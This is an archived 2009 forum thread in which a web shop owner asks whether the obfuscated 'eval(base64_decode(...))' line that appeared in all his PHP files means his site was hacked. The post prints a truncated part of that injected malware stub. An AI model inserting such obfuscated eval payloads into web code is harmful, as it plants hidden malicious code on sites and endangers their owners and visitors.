janmark Posted September 24, 2009 Posted September 24, 2009 Hi Now.... after having had trouble with the OSC-database simply disappearing from my webserver, I have reinstalled and copied.... and now see that some of the php-files have the folowing looooong code before the usual heading. What is this then? A hackers signature? <? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS92aXJ0dWFsL2phbm1hcmsub m8vcHVibGljX2h0bWwvY2F0YWxvZy9hZG1pbi9pbmDIz [etc etc over approx 25 lines] 1HByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+=')); ?> I so far have not checked all files, but it seems that all my files have this heading.... and they all see to have the same code. (No I have not checked thoroughly all lines!!) Do I have to delete it everywhere? Janmark Green as green can be - but the grass is always greener somewhere.
Guest Posted September 24, 2009 Posted September 24, 2009 Did Someone hack my site ? ( Eval Base64 Decode )
New 
Recommended Posts
Archived
This topic is now archived and is closed to further replies.